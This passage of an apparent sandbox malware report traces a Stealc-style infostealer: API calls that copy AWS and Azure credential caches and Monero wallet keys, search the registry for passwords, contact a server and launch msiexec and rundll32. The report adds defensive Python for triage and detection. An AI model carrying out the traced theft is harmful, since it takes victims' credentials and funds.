                              • Part of subcall function 00684910: wsprintfA.USER32 ref: 006849E2
                              • Part of subcall function 00684910: PathMatchSpecA.SHLWAPI(?,?), ref: 00684A1E
                              • Part of subcall function 00684910: lstrcat.KERNEL32(?,012BF510), ref: 00684A4A
                              • Part of subcall function 00684910: lstrcat.KERNEL32(?,00690FF8), ref: 00684A5C
                              • Part of subcall function 00684910: lstrcat.KERNEL32(?,?), ref: 00684A70
                              • Part of subcall function 00684910: lstrcat.KERNEL32(?,00690FFC), ref: 00684A82
                              • Part of subcall function 00684910: lstrcat.KERNEL32(?,?), ref: 00684A96
                              • Part of subcall function 00684910: CopyFileA.KERNEL32(?,?,00000001), ref: 00684AAC
                              • Part of subcall function 00684910: DeleteFileA.KERNEL32(?), ref: 00684B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: d2441f68de8692d2604e61d4c56fd5c670e8570fd84aa37d80fb9a6eed3cbc68
                            • Instruction ID: 417ed71c17d0829e06e11ca6aee17fc06f10bdfeadff549614ae86c910a35dce
                            • Opcode Fuzzy Hash: d2441f68de8692d2604e61d4c56fd5c670e8570fd84aa37d80fb9a6eed3cbc68
                            • Instruction Fuzzy Hash: 0D41E2BA94020467DB94F760EC47FED333EAB60700F004598B689664C2FEB55BC9CB92
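The call sequence and strings above show what this function does: it resolves a per-user base folder with SHGetFolderPathA (the subcall passes CSIDL 0x1C, CSIDL_LOCAL_APPDATA), appends `\.azure\`, `\.aws\` and `\.IdentityService\`, walks each folder with FindFirstFileA/FindNextFileA, tests names with PathMatchSpecA (the recovered patterns are `*.*` and `msal.cache`) and copies matches with CopyFileA, with the `Azure\.aws`-style strings looking like the staging sub-folders. The Python below is an added incident-response example by the editor, not Joe Sandbox output or the sample's code: pointed at a compromised profile, it lists what a Stealc-style walk of those three folders would have collected and flags the files that hold reusable cloud secrets. The recursion, the choice of one base folder for all three names (`.aws` and `.azure` normally sit in the user profile, `.IdentityService` under local AppData) and every triage name other than `msal.cache` are this example's assumptions; the profile tree it builds is constructed.

```python
import os
import tempfile
from pathlib import Path

# Folders the function appends to the resolved base path (lstrcat arguments above).
TARGET_DIRS = (".azure", ".aws", ".IdentityService")

# Triage map. "msal.cache" is recovered from the sample's strings; the remaining
# names are where the AWS CLI, Azure CLI and MSAL normally keep secrets and are
# this example's assumption, not something the report shows.
HIGH_VALUE = {
    "credentials": "AWS CLI long-lived access keys: rotate",
    "msal.cache": "MSAL token cache (refresh tokens): revoke sign-in sessions",
    "msal_token_cache.bin": "Azure CLI token cache (refresh tokens): revoke",
    "accessTokens.json": "legacy Azure CLI token store: revoke",
    "azureProfile.json": "Azure CLI tenant/subscription list: recon value only",
}


def inventory(base: Path) -> list:
    """Relative paths of every file under base/<TARGET_DIRS>.

    Recurses, as the sample's FindFirstFileA/FindNextFileA loop is assumed to;
    returns [] for a base that has none of the three folders.
    """
    out = []
    for d in TARGET_DIRS:
        root = base / d
        if not root.is_dir():
            continue
        for dirpath, _dirs, files in os.walk(root):
            for name in sorted(files):
                out.append(Path(dirpath, name).relative_to(base))
    return out


def triage(files) -> list:
    """(path, why it matters) for each inventoried file whose name is in HIGH_VALUE."""
    return [(p.as_posix(), HIGH_VALUE[p.name]) for p in files if p.name in HIGH_VALUE]


def build_constructed_profile(base: Path) -> None:
    """Constructed profile tree for the example; file contents are placeholders."""
    samples = {
        ".aws/credentials": "[default]\naws_access_key_id = AKIAEXAMPLE\naws_secret_access_key = example\n",
        ".aws/config": "[default]\nregion = eu-west-1\n",
        ".azure/azureProfile.json": '{"subscriptions": []}',
        ".azure/msal_token_cache.bin": "placeholder",
        ".azure/logs/az.log": "placeholder",
        ".IdentityService/msal.cache": "placeholder",
    }
    for rel, text in samples.items():
        p = base / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(text)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        build_constructed_profile(base)
        files = inventory(base)
        print(f"{len(files)} files a Stealc-style walk would have taken from {base}")
        for path, why in triage(files):
            print(f"  {path}: {why}")
```

Run it against the real profile by passing the user's home directory (and, for `.IdentityService`, the local AppData directory) to `inventory` instead of the constructed tree; anything `triage` returns should be treated as exposed and rotated or revoked, not merely deleted.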
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0068906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: 9d5f481f553cfe5829bbce37c117228561b14337ff5cc0950d99a3ff368f72a3
                            • Instruction ID: 35be42e43381e5ee096168889fde96226cc1df146abe2a2389d380825d904b1b
                            • Opcode Fuzzy Hash: 9d5f481f553cfe5829bbce37c117228561b14337ff5cc0950d99a3ff368f72a3
                            • Instruction Fuzzy Hash: 6F7111B1910208AFDB08EFE4DC89FEEB7B9BF48700F148618F515A7290DB34A945CB65
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 006831C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 0068335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 006834EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: 5f97d25b93085d89bfa76c142c3c4a609b6e265e841d07eb3fb444d99e72386f
                            • Instruction ID: 301059d3de22d7c3ea0f540beb5058b71cc1bfa8b81dcd7bcc0c57aa301a8023
                            • Opcode Fuzzy Hash: 5f97d25b93085d89bfa76c142c3c4a609b6e265e841d07eb3fb444d99e72386f
                            • Instruction Fuzzy Hash: C81201B18101189AEB59FBD0DC92FDDB77AAF14300F50425EE90676191EF382B4ACF66
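The String ID line above recovers the pieces this function concatenates before each ShellExecuteEx call: the fixed launcher paths `C:\Windows\system32\msiexec.exe` and `C:\Windows\system32\rundll32.exe`, the extensions `.msi` and `.dll` it tests for, and the `/i "` and ` /passive` fragments of an unattended installer command line (`/passive` runs the install with only a progress bar and no prompts). The Python below is an added detection example by the editor, not part of the Joe Sandbox output or of the sample: it classifies process-creation command lines against those two launch patterns and runs over constructed log events. The msiexec rule requires the `/passive` switch; the rundll32 rule only fires for a DLL outside the Windows directory, which is this example's own tuning choice because the listing does not show where the sample drops its payload. The event field names and paths are constructed; only the parent image name mirrors the analysed sample.

```python
import re
from typing import Optional

# Launcher paths recovered from the sample's strings (String ID line above).
MSIEXEC = r"C:\Windows\system32\msiexec.exe"
RUNDLL32 = r"C:\Windows\system32\rundll32.exe"

# msiexec.exe /i "<package>.msi" /passive  (the order the recovered fragments suggest)
_MSI_PASSIVE = re.compile(
    r'^"?(?:[a-z]:\\windows\\system32\\)?msiexec\.exe"?\s+/i\s+"(?P<pkg>[^"]+\.msi)"\s+/passive\b',
    re.IGNORECASE,
)
# rundll32.exe <library>.dll[,Export]  (the DLL may or may not be quoted)
_RUNDLL32 = re.compile(
    r'^"?(?:[a-z]:\\windows\\system32\\)?rundll32\.exe"?\s+"?(?P<dll>[^",]+\.dll)"?',
    re.IGNORECASE,
)
# Tuning assumption: a DLL given by bare name or located under the Windows
# directory is treated as benign so ordinary rundll32 usage does not fire.
_WINDIR = re.compile(r"^[a-z]:\\windows\\", re.IGNORECASE)


def classify(cmdline: str) -> Optional[str]:
    """Return a detection label for one process command line, or None."""
    line = cmdline.strip()
    if _MSI_PASSIVE.match(line):
        return "msiexec_passive_install"
    m = _RUNDLL32.match(line)
    if m:
        dll = m.group("dll")
        if "\\" in dll and not _WINDIR.match(dll):
            return "rundll32_nonsystem_dll"
    return None


def triage(events):
    """Attach a detection label to every event whose command line matches."""
    hits = []
    for ev in events:
        label = classify(ev["cmdline"])
        if label:
            hits.append({**ev, "detection": label})
    return hits


# Constructed process-creation events (not taken from the report).
SAMPLE_EVENTS = [
    {"pid": 4711, "parent": r"C:\Users\victim\Downloads\file.exe",
     "cmdline": r'C:\Windows\system32\msiexec.exe /i "C:\Users\victim\AppData\Local\Temp\update.msi" /passive'},
    {"pid": 4712, "parent": r"C:\Users\victim\Downloads\file.exe",
     "cmdline": r'C:\Windows\system32\rundll32.exe "C:\Users\victim\AppData\Local\Temp\helper.dll",Start'},
    {"pid": 4713, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\system32\rundll32.exe shell32.dll,Control_RunDLL"},
    {"pid": 4714, "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\system32\msiexec.exe /V"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f'pid {hit["pid"]} [{hit["detection"]}] {hit["cmdline"]}')
```

Pair either label with the parent process in the event (here the dropper itself) before alerting: msiexec and rundll32 are signed Windows binaries, so the command-line shape is the indicator, not the image.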
                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 00676280: InternetOpenA.WININET(00690DFE,00000001,00000000,00000000,00000000), ref: 006762E1
                              • Part of subcall function 00676280: StrCmpCA.SHLWAPI(?,012BF3F0), ref: 00676303
                              • Part of subcall function 00676280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00676335
                              • Part of subcall function 00676280: HttpOpenRequestA.WININET(00000000,GET,?,012BEBF8,00000000,00000000,00400100,00000000), ref: 00676385
                              • Part of subcall function 00676280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006763BF
                              • Part of subcall function 00676280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006763D1
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00685318
                            • lstrlen.KERNEL32(00000000), ref: 0068532F
                              • Part of subcall function 00688E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00688E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00685364
                            • lstrlen.KERNEL32(00000000), ref: 00685383
                            • lstrlen.KERNEL32(00000000), ref: 006853AE
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: ece0aa0de12f3456b8a21dfa4c67db1398d1e18f32a185ca33ed999940ccc57e
                            • Instruction ID: 6ee4e895dbeeda69ed7d5e41ca5816b4bec11e6246b13f475cd2a8b61ff7a990
                            • Opcode Fuzzy Hash: ece0aa0de12f3456b8a21dfa4c67db1398d1e18f32a185ca33ed999940ccc57e
                            • Instruction Fuzzy Hash: A55120709111089BEB58FFA4CD96AED777BAF10300F50421DF80A5A592EF386B46CB66
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 6a9db6ca1c6584dd9717363ec7986477fe4e780ca730901278c011b4eade4a14
                            • Instruction ID: 5799a949a441a53962e32add556fced0590d553f3d01727bb90d54ce0b9094a8
                            • Opcode Fuzzy Hash: 6a9db6ca1c6584dd9717363ec7986477fe4e780ca730901278c011b4eade4a14
                            • Instruction Fuzzy Hash: 59C1B5B59001099BCB58FFA0DC89FEA7779BF54300F00469DF50AA7241DB74AA85CFA5
                            APIs
                              • Part of subcall function 00688DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00688E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 006842EC
                            • lstrcat.KERNEL32(?,012BEB38), ref: 0068430B
                            • lstrcat.KERNEL32(?,?), ref: 0068431F
                            • lstrcat.KERNEL32(?,012BD698), ref: 00684333
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 00688D90: GetFileAttributesA.KERNEL32(00000000,?,00671B54,?,?,0069564C,?,?,00690E1F), ref: 00688D9F
                              • Part of subcall function 00679CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00679D39
                              • Part of subcall function 006799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006799EC
                              • Part of subcall function 006799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00679A11
                              • Part of subcall function 006799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00679A31
                              • Part of subcall function 006799C0: ReadFile.KERNEL32(000000FF,?,00000000,0067148F,00000000), ref: 00679A5A
                              • Part of subcall function 006799C0: LocalFree.KERNEL32(0067148F), ref: 00679A90
                              • Part of subcall function 006799C0: CloseHandle.KERNEL32(000000FF), ref: 00679A9A
                              • Part of subcall function 006893C0: GlobalAlloc.KERNEL32(00000000,006843DD,006843DD), ref: 006893D3
                            • StrStrA.SHLWAPI(?,012BE9E8), ref: 006843F3
                            • GlobalFree.KERNEL32(?), ref: 00684512
                              • Part of subcall function 00679AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ng,00000000,00000000), ref: 00679AEF
                              • Part of subcall function 00679AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00674EEE,00000000,?), ref: 00679B01
                              • Part of subcall function 00679AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ng,00000000,00000000), ref: 00679B2A
                              • Part of subcall function 00679AC0: LocalFree.KERNEL32(?,?,?,?,00674EEE,00000000,?), ref: 00679B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 006844A3
                            • StrCmpCA.SHLWAPI(?,006908D1), ref: 006844C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006844D2
                            • lstrcat.KERNEL32(00000000,?), ref: 006844E5
                            • lstrcat.KERNEL32(00000000,00690FB8), ref: 006844F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: cc49cf7f3e4d43443ed59b80eed11eb8d7903dc94caee8688eee273d7137e69b
                            • Instruction ID: 08001adbde59dcef8d74f96a53045153f2b6a86879fa6d4151ae279fc2b4adbd
                            • Opcode Fuzzy Hash: cc49cf7f3e4d43443ed59b80eed11eb8d7903dc94caee8688eee273d7137e69b
                            • Instruction Fuzzy Hash: F17147B6900208ABDB54FBE4DC85FEE777ABB48300F04469DF60997181EA34DB45CBA5
                            APIs
                              • Part of subcall function 006712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006712B4
                              • Part of subcall function 006712A0: RtlAllocateHeap.NTDLL(00000000), ref: 006712BB
                              • Part of subcall function 006712A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006712D7
                              • Part of subcall function 006712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006712F5
                              • Part of subcall function 006712A0: RegCloseKey.ADVAPI32(?), ref: 006712FF
                            • lstrcat.KERNEL32(?,00000000), ref: 0067134F
                            • lstrlen.KERNEL32(?), ref: 0067135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00671377
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 00688B60: GetSystemTime.KERNEL32(00690E1A,012BE078,006905AE,?,?,006713F9,?,0000001A,00690E1A,00000000,?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 00688B86
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00671465
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006799EC
                              • Part of subcall function 006799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00679A11
                              • Part of subcall function 006799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00679A31
                              • Part of subcall function 006799C0: ReadFile.KERNEL32(000000FF,?,00000000,0067148F,00000000), ref: 00679A5A
                              • Part of subcall function 006799C0: LocalFree.KERNEL32(0067148F), ref: 00679A90
                              • Part of subcall function 006799C0: CloseHandle.KERNEL32(000000FF), ref: 00679A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 006714EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 70203c9989e818aba12de0a06690f5562faad3ea70abe7985aceaaabee6a5916
                            • Instruction ID: 7bde3c0de54759eb6442ba8f2562136bbf6b88f5d87dded679da03d30883f44b
                            • Opcode Fuzzy Hash: 70203c9989e818aba12de0a06690f5562faad3ea70abe7985aceaaabee6a5916
                            • Instruction Fuzzy Hash: F45176B1D1011957DB59FB60DC92FED733DAF50300F4042DDB60A62082EE346B89CBAA
                            APIs
                              • Part of subcall function 006772D0: memset.MSVCRT ref: 00677314
                              • Part of subcall function 006772D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0067733A
                              • Part of subcall function 006772D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006773B1
                              • Part of subcall function 006772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0067740D
                              • Part of subcall function 006772D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00677452
                              • Part of subcall function 006772D0: HeapFree.KERNEL32(00000000), ref: 00677459
                            • lstrcat.KERNEL32(00000000,006917FC), ref: 00677606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00677648
                            • lstrcat.KERNEL32(00000000, : ), ref: 0067765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0067768F
                            • lstrcat.KERNEL32(00000000,00691804), ref: 006776A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006776D3
                            • lstrcat.KERNEL32(00000000,00691808), ref: 006776ED
                            • task.LIBCPMTD ref: 006776FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: :
                            • API String ID: 3191641157-3653984579
                            • Opcode ID: 462521a8ed232bed8b8acfe8a97540ae8bfd7bbf2e29d8497494d127ab9e64d4
                            • Instruction ID: e46f3cd2a8db2f09c8707bba927079990196065ccd0baef3c9ff25dd1469734d
                            • Opcode Fuzzy Hash: 462521a8ed232bed8b8acfe8a97540ae8bfd7bbf2e29d8497494d127ab9e64d4
                            • Instruction Fuzzy Hash: 10316FB190010AEFCB48EBF4DC89DFF777ABB55301B148218F106A7290DA34AD46CB66
                            APIs
                            • memset.MSVCRT ref: 00677314
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0067733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006773B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0067740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00677452
                            • HeapFree.KERNEL32(00000000), ref: 00677459
                            • task.LIBCPMTD ref: 00677555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
